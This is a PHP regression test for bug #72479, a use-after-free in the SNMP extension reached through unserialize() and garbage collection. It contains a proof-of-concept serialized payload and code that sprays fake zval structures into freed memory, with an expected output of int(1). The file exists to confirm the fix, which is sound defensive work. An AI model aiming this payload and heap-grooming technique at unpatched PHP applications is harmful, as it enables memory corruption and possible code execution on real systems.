1--TEST-- 2Bug #72479: Use After Free Vulnerability in SNMP with GC and unserialize() 3--SKIPIF-- 4<?php 5require_once(dirname(__FILE__).'/skipif.inc'); 6?> 7--FILE-- 8<?php 9$arr = [1, [1, 2, 3, 4, 5], 3, 4, 5]; 10$poc = 'a:3:{i:1;N;i:2;O:4:"snmp":1:{s:11:"quick_print";'.serialize($arr).'}i:1;R:7;}'; 11$out = unserialize($poc); 12gc_collect_cycles(); 13$fakezval = ptr2str(1122334455); 14$fakezval .= ptr2str(0); 15$fakezval .= "\x00\x00\x00\x00"; 16$fakezval .= "\x01"; 17$fakezval .= "\x00"; 18$fakezval .= "\x00\x00"; 19for ($i = 0; $i < 5; $i++) { 20 $v[$i] = $fakezval.$i; 21} 22var_dump($out[1]); 23 24function ptr2str($ptr) 25{ 26 $out = ''; 27 for ($i = 0; $i < 8; $i++) { 28 $out .= chr($ptr & 0xff); 29 $ptr >>= 8; 30 } 31 return $out; 32} 33?> 34--EXPECT-- 35int(1) 36